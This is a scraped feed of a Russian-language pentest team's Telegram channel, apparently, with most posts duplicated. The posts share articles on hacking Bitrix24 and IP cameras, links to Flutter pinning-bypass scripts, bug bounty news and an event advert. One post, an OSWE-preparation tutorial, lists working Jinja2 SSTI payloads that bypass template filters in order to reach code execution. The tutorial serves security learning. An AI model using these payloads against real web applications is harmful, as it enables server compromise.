[Bitrix24 pwn]
Всем привет!👋
Наткнулся на интересную статью о компрометации Bitrix24. Из ключевого:
➡ Компрометация через мобильное приложение
➡ Много OSINT
Ломаем корпоративный портал Bitrix24 через мобильное приложение.
Всегда старайтесь проявлять креатив и смотреть чуть шире и скорее всего все получится👍
#bitrix24 #pwn #osint
Всем привет!
Наткнулся на интересную статью о компрометации Bitrix24. Из ключевого:
Ломаем корпоративный портал Bitrix24 через мобильное приложение.
Всегда старайтесь проявлять креатив и смотреть чуть шире и скорее всего все получится
#bitrix24 #pwn #osint
Please open Telegram to view this post
VIEW IN TELEGRAM
[IP-камеры на пентестах. Используем видеокамеры не по назначению]
Всем привет!👋
Вышла моя статья на xakep. В статье разбирается 4 кейса компрометации камеры:
🔘 Кейс 1: пароль по умолчанию
🔘 Кейс 2: уязвимость в прошивке
🔘 Кейс 3: хардкод в прошивке
🔘 Кейс 4: модификация прошивки
Если знаете статьи с ресерчами камер, киньте в комменты, пожалуйста💓
#xakep #cameras #magazine #GigaHackers
Всем привет!
Вышла моя статья на xakep. В статье разбирается 4 кейса компрометации камеры:
Если знаете статьи с ресерчами камер, киньте в комменты, пожалуйста
#xakep #cameras #magazine #GigaHackers
Please open Telegram to view this post
VIEW IN TELEGRAM
[Минута мотивации для этичных хакеров]
Всем привет!👋
Недавно я решил попробовать себя в Bug Bounty. Пока уязвимости не такие крутые, но тем не менее уже удалось получить свою первую ачивку, чему очень рад!
Если бы мне ещё пол года назад сказали, что у меня будет хотя бы 1 подтвержденный репорт - я бы не поверил сразу :)
Всегда приятно получать символические презенты в деле, которое тебе искренне нравится. Это создает соревновательный дух и дополнительно мотивирует двигаться дальше в нашей сфере🦾
Помните, что всему можно научиться. Никто не рождается гуру-хакером из коробки. Уверен, что труд и прилежание всегда окупаются. Двигайтесь вперед, планомерно, в своем темпе, но на регулярной основе. И не останавливайтесь на достигнутом, тогда вас обязательно ждет успех!🔥
P/S Есть ли ещё багхантеры среди нас? Пишите в комментарии👍🏻
#bug_bounty #motivation
Всем привет!👋
Недавно я решил попробовать себя в Bug Bounty. Пока уязвимости не такие крутые, но тем не менее уже удалось получить свою первую ачивку, чему очень рад!
Если бы мне ещё пол года назад сказали, что у меня будет хотя бы 1 подтвержденный репорт - я бы не поверил сразу :)
Всегда приятно получать символические презенты в деле, которое тебе искренне нравится. Это создает соревновательный дух и дополнительно мотивирует двигаться дальше в нашей сфере🦾
Помните, что всему можно научиться. Никто не рождается гуру-хакером из коробки. Уверен, что труд и прилежание всегда окупаются. Двигайтесь вперед, планомерно, в своем темпе, но на регулярной основе. И не останавливайтесь на достигнутом, тогда вас обязательно ждет успех!🔥
P/S Есть ли ещё багхантеры среди нас? Пишите в комментарии👍🏻
#bug_bounty #motivation
[📱iOS — cниффим трафик Flutter приложения]
Всем привет! 👋
Недавно столкнулся с приложением на
Особенность заключается в том, что некоторые приложения Flutter/Dart могут использовать встроенные сертификаты вместо системных, что делает невозможным использование пользовательских сертификатов, установленных на устройстве. Также одной из причин может быть игнорирование стандартных настроек прокси, которые обычно используются для перенаправления трафика в Burp.
Данная тема не обходится через стандартный
💻 https://github.com/hackcatml/frida-flutterproxy - проксирование через бурп
💻 https://codeshare.frida.re/@zionspike/bypass-flutter-pinning-ios/ - скрипт для обхода пиннинга
#mobile #appsec
Всем привет! 👋
Недавно столкнулся с приложением на
flutter
для iOS. Данный фреймворк имеет некоторые особенности в плане работы с протоколом HTTP.Особенность заключается в том, что некоторые приложения Flutter/Dart могут использовать встроенные сертификаты вместо системных, что делает невозможным использование пользовательских сертификатов, установленных на устройстве. Также одной из причин может быть игнорирование стандартных настроек прокси, которые обычно используются для перенаправления трафика в Burp.
Данная тема не обходится через стандартный
objection
, однако ИБ комьюнити выручает и можно использовать, например, скрипты ниже для проксирования и обхода пиннинга.💻 https://github.com/hackcatml/frida-flutterproxy - проксирование через бурп
💻 https://codeshare.frida.re/@zionspike/bypass-flutter-pinning-ios/ - скрипт для обхода пиннинга
#mobile #appsec
[ Bitrix — поговорим о наболевшем ]
Всем привет!👋
Многие неоднократно слышали о CMS Bitrix — весьма удобная система для управления сайтом. Однако сильно уязвимая из "коробки". Об эксплуатации многих нюансов и уязвимостей было не раз сказано в комьюнити этичных хакеров.
Сейчас я хочу внести свой скромный вклад и рассказать о замеченных мною недостатках и особенностях этой CMS.
Данные мелочи не раз помогали мне как на Bug Bounty, так и на проектах по внешнему пентесту.
Надеюсь, что эти маленькие нюансы в сумме смогут помочь вам и вашей команде на проектах.
Приятного чтения:)
#bitrix24 #web #bug_bounty
Всем привет!👋
Многие неоднократно слышали о CMS Bitrix — весьма удобная система для управления сайтом. Однако сильно уязвимая из "коробки". Об эксплуатации многих нюансов и уязвимостей было не раз сказано в комьюнити этичных хакеров.
Сейчас я хочу внести свой скромный вклад и рассказать о замеченных мною недостатках и особенностях этой CMS.
Данные мелочи не раз помогали мне как на Bug Bounty, так и на проектах по внешнему пентесту.
Надеюсь, что эти маленькие нюансы в сумме смогут помочь вам и вашей команде на проектах.
Приятного чтения:)
#bitrix24 #web #bug_bounty
Please open Telegram to view this post
VIEW IN TELEGRAM
Media is too big
VIEW IN TELEGRAM
[Пентесты ОКИИ]
Всем привет!👋
В работе пентестера встречаются не только ламповые проекты, которые делаются удаленно из офиса, но и хардовые проекты с выездом на объекты к заказчику. Площадка может быть абсолютно любая, в частности относиться к ОКИИ 🏭🏦🏥
Коллеги из нашей команды подготовили крутой и полезный материал для всех, кто интересуется пентестами🔥
📣 Для посещения регистрируйтесь заранее!
01.08.24 в 12:00 по Мск
Всем привет!
В работе пентестера встречаются не только ламповые проекты, которые делаются удаленно из офиса, но и хардовые проекты с выездом на объекты к заказчику. Площадка может быть абсолютно любая, в частности относиться к ОКИИ 🏭🏦🏥
Коллеги из нашей команды подготовили крутой и полезный материал для всех, кто интересуется пентестами
01.08.24 в 12:00 по Мск
Please open Telegram to view this post
VIEW IN TELEGRAM
[Полезные ссылки]
Всем привет!👋
Сегодня у нас полезная информация для начинающих!
Невозможно запомнить каждую команду в голове, для этого существуют заметки.📝 Хочу поделиться ссылками на различные агрегаторы информации, которыми мы частенько пользуемся в работе.
📌 HackTricks - заметки на каждый день обо всем про пентест (про конкретные порты, службы, сервисы)
📌 The Hacker Recipes - годнота в основном про AD (готовые команды и рецепты на все случаи жизни)
📌 PayloadAllTheThings - репозиторий, содержащий различные словари для самых разных проверок, а также наборы техник и чеклистов под конкретные продукты, например AD
📌 Pentester's Promiscuous Notebook - крутые и очень полезные заметки пентестера
📌 Red Team Notes - заметочки с уклоном в red team
Пишите в комментария, чем пользуетесь лично вы?✏️
#learn #start
Всем привет!
Сегодня у нас полезная информация для начинающих!
Невозможно запомнить каждую команду в голове, для этого существуют заметки.
Пишите в комментария, чем пользуетесь лично вы?
#learn #start
Please open Telegram to view this post
VIEW IN TELEGRAM
[Pentest award]
Всем привет!👋
Хочу поделиться с вами радостным событием. В пятницу 2 августа прошла церемония награждения пентестеров, известная как Pentest award 2024👑
В этом году участников стало больше, кейсы интереснее, и масштаб самой церемонии конечно увеличился!
В этом году мы с @WILD_41 попали в шорт-лист в нескольких номинациях.
Мой кейс в итоге удостоился 2 места в номинации "девайс", чему я безгранично рад!🥈
Также хочется сказать огромное спасибо организаторам за шикарную подготовку мероприятия, жюри за проделанную работу по отбору кейсов. А победители в своих номинациях поистине крутые!
Всем, кто с мог прийти лично - отдельный респект, круто пообщались💬
#pentestaward
Всем привет!
Хочу поделиться с вами радостным событием. В пятницу 2 августа прошла церемония награждения пентестеров, известная как Pentest award 2024
В этом году участников стало больше, кейсы интереснее, и масштаб самой церемонии конечно увеличился!
В этом году мы с @WILD_41 попали в шорт-лист в нескольких номинациях.
Мой кейс в итоге удостоился 2 места в номинации "девайс", чему я безгранично рад!
Также хочется сказать огромное спасибо организаторам за шикарную подготовку мероприятия, жюри за проделанную работу по отбору кейсов. А победители в своих номинациях поистине крутые!
Всем, кто с мог прийти лично - отдельный респект, круто пообщались
#pentestaward
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Всем привет👋
Пока @WILD_41 и @VlaDriev ожидали результатов премии pentest award, я успел получить презенты за акцию от TimeWeb в рамках их BB программы.
Спасибо большое @bizone_bb и @timewebru за подарки. Вы делаете крутые вещи в сфере bug bounty!💪
А я снова скажу: не бойтесь пробовать и продолжайте развиваться, всё возможно👍
#bug_bounty
Пока @WILD_41 и @VlaDriev ожидали результатов премии pentest award, я успел получить презенты за акцию от TimeWeb в рамках их BB программы.
Спасибо большое @bizone_bb и @timewebru за подарки. Вы делаете крутые вещи в сфере bug bounty!💪
А я снова скажу: не бойтесь пробовать и продолжайте развиваться, всё возможно👍
#bug_bounty
[PoC Windows Downdate]
Всем привет!👋
Не так давно отгремели конференции Black Hat 2024 и DEF CON 32. Лучшие исследователи со всего мира поделились своими наработками. Хочу отметить несколько из них, которые меня заинтересовали. Публиковать буду постепенно, так как контента достаточно много.
Первый доклад, который меня зацепил - Windows Downdate: Downgrade Attacks Using Windows Updates
Автор рассказал как можно понизить версии отдельных файлов через центр обновления Windows и тем самым сделать ОС уязвимой к старым проблемам!👍
Для понимания рекомендую к прочтению публикацию📝
💻 И уже даже есть PoC с примерами от автора!
🐤 Ну и конечно ссылка на автора.
#Windows #PoC #AD #DC32 #BH2024 #CVE
Всем привет!
Не так давно отгремели конференции Black Hat 2024 и DEF CON 32. Лучшие исследователи со всего мира поделились своими наработками. Хочу отметить несколько из них, которые меня заинтересовали. Публиковать буду постепенно, так как контента достаточно много.
Первый доклад, который меня зацепил - Windows Downdate: Downgrade Attacks Using Windows Updates
Автор рассказал как можно понизить версии отдельных файлов через центр обновления Windows и тем самым сделать ОС уязвимой к старым проблемам!
Для понимания рекомендую к прочтению публикацию
#Windows #PoC #AD #DC32 #BH2024 #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
Работаешь в IT или с IT? Тогда тебе точно понравится на UIC DEV 2024! 💥
🖥 UIC Dev - ежегодная Технологическая конференция для специалистов из интернет-сферы: от HR-ов до IT-директоров. Да, мы не только для разработчиков, но и для аналитиков, тестировщиков, дизайнеров, маркетологов, SEO-шников, копирайтеров и т.д.❤
В этом году на нашей 7-ой вечеринке тебя ждут:
🎯 6 больших направлений по несколько секций: разработка, управление и анализ, бизнес+IT, дизайн и контент, маркетинг и digital, UIC Talks.
🎯 80+ докладов про инструменты, кейсы, "боли" IT-сообщества, AI и будущее.
🎯 Обсуждение актуальных событий, разбор трендов из области IT и не только.
🎯 Общение с единомышленниками, дискуссии, обмен опытом, новые идеи.
🎯 Интерактивы и розыгрыши призов на стендах партнеров.
Вечером первого дня пройдет🔥 афтепати с выступлением группы “Стихи на окнах подъезда №8”, дискотекой, лайтовым общением и развлечениями. 🚀
📅 7-8 октября 2024 г.
📍 ТРЦ “Сигма”, г. Ижевск, пер. Широкий, 53, 3-4 эт.
❗️ Подробности: uic.dev и vk.com/uicdev
В этом году на нашей 7-ой вечеринке тебя ждут:
🎯 6 больших направлений по несколько секций: разработка, управление и анализ, бизнес+IT, дизайн и контент, маркетинг и digital, UIC Talks.
🎯 80+ докладов про инструменты, кейсы, "боли" IT-сообщества, AI и будущее.
🎯 Обсуждение актуальных событий, разбор трендов из области IT и не только.
🎯 Общение с единомышленниками, дискуссии, обмен опытом, новые идеи.
🎯 Интерактивы и розыгрыши призов на стендах партнеров.
Вечером первого дня пройдет
📅 7-8 октября 2024 г.
📍 ТРЦ “Сигма”, г. Ижевск, пер. Широкий, 53, 3-4 эт.
❗️ Подробности: uic.dev и vk.com/uicdev
Please open Telegram to view this post
VIEW IN TELEGRAM
[Обход фильтров в SSTI в Jinja2]
Не так давно в рамках подготовки к OSWE столкнулся с необходимостью обходить фильтры SSTI, проверяющие непосредственный темплейт.
Уязвимое приложение проверяло наличие
Поэтому ловите несколько способов модификации пейлоада, чтобы обойти подобные фильтры или даже WAF целиком:
🔸 Для обхода фильтра по
🔸 Можно использовать сложение строк или закодировать
🔸 Также можно обратиться к атрибутам по индексу
🔸 Кроме того, можно использовать
🔸 Для обхода фильтра по
🔸 Для обхода фильтра по
🔸 В случае, если встретился фильтр по
Конечно количество фильтров может быть разнообразным, но тут уже скорее встает вопрос комбинации предложенных выше методов. 👆
Для закрепления я разработал небольшой стенд 🔥. Кому будет интересно, то можете проверить знания и навыки в деле!
@GigaHack
#web #stand #SSTI #learn #OSWE
Не так давно в рамках подготовки к OSWE столкнулся с необходимостью обходить фильтры SSTI, проверяющие непосредственный темплейт.
Уязвимое приложение проверяло наличие
.__
в строке передаваемого темплейта, что не давало просто использовать пейлоад из HackTricks и наслаждаться RCE на уязвимой машине. Поэтому ловите несколько способов модификации пейлоада, чтобы обойти подобные фильтры или даже WAF целиком:
🔸 Для обхода фильтра по
.__
можно использовать |attr()
{{ ''|attr('__class__’)}}
🔸 Можно использовать сложение строк или закодировать
{{request|attr("__"+"class"+"__")}}
{{''['\x5f\x5fclass\x5f\x5f']}}
🔸 Также можно обратиться к атрибутам по индексу
request["__class__"]
🔸 Кроме того, можно использовать
Statements
для определения переменных в темплейте{% set string = "ssti" %}
{% set class = "__class__" %}
{{ string|attr(class)}}
{% with a = config.__class__.mro()[-1].__subclasses__() %} {{ a }} {% endwith %}
🔸 Для обхода фильтра по
__
можно использовать requests.args
для передачи частей полезной нагрузки в параметрах запроса и |join
для соединения элементов в одну строку{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}&class=class&usc=_
🔸 Для обхода фильтра по
[]
можно использовать |getlist()
. Данный метод возвращает всех значения, связанные с определенным ключом в запросе{{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_
🔸 В случае, если встретился фильтр по
|join
, можно использовать |format
для форматирования строк по переданным значениями{{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_
Конечно количество фильтров может быть разнообразным, но тут уже скорее встает вопрос комбинации предложенных выше методов. 👆
Для закрепления я разработал небольшой стенд 🔥. Кому будет интересно, то можете проверить знания и навыки в деле!
@GigaHack
#web #stand #SSTI #learn #OSWE
[Полезный читшит для SSRF, CORS и open-redirect]
В последнее время у portswigger-а активно пополняются заметки по различным темам. Эта шпаргалка содержит полезные нагрузки для обхода проверки URL. Приведенные списки слов полезны для реализации следующих типов атак: SSRF, неправильные конфигурации CORS и open-redirect. Очень полезно, если кончились идеи, а ошибку с кодом 403 обходить надо. Также будет полезно и тем, кто только погружается историю с данными веб-уязвимостями.
https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet
#web #bypass #cheet_sheet
В последнее время у portswigger-а активно пополняются заметки по различным темам. Эта шпаргалка содержит полезные нагрузки для обхода проверки URL. Приведенные списки слов полезны для реализации следующих типов атак: SSRF, неправильные конфигурации CORS и open-redirect. Очень полезно, если кончились идеи, а ошибку с кодом 403 обходить надо. Также будет полезно и тем, кто только погружается историю с данными веб-уязвимостями.
https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet
#web #bypass #cheet_sheet